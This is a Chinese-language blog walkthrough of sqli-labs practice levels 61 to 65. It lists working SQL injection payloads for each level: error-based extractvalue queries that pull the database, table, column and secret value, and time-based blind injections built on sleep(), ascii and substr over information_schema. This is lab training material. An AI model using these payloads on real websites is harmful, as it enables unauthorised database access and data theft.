• sqli-labs闯关之61-65关


    最后五关!

    第六十一关

    和六十关基本一样,就是变成了单括号和双括号,这好像是第一次遇见双括号

    爆数据库名   ?id=1'))and extractvalue(1, concat(0x5c, (select database())))%23

    爆表名    ?id=0‘)) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))%23

     爆列名       ?id=-1')) union select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='73eg2fztqt'),0x7e))--+

     爆数据      ?id=-1')) union select extractvalue(1,concat(0x7e,(select group_concat(secret_BPYL) from 73eg2fztqt),0x7e))--+

    输入(j6oVSqH7quRAqt1ywsF06Spm)进去后

    BUG OFF YOU SILLY DUMB HACKER(滚开你这个愚蠢的黑客)

    第六十二关

    这关这次联合注入和报错注入都不可以了 ,那我们呢用盲注

    ?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(3))--+

    第六十三关

    和六十二关基本一样,唯一区别在于需要使用单引号闭合

    ?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
    正确时间短,错误时间长

    第六十四关

    和六十二关基本一样,唯一区别在于需要使用括号闭合

    ?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
    正确时间短,错误时间长

    第六十五关

    和六十二关基本一样,同上,只不过?id=1”) 正确延时

     ?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+

    结束!

     


     

  • 相关阅读:
    求最长不降子序列

    普通背包问题
    求最大子序列
    最大人品
    C# 显示webBrowser页面加载进度
    Provider 错误 '80004005' 未指定的错误 的最终解决方法
    C# 截取webBrowser网页存为图片
    浅谈Python小数据池
    js文件编译成动态链接库(dll)文件
  • 原文地址:https://www.cnblogs.com/escwq/p/12264086.html
Copyright © 2020-2023  润新知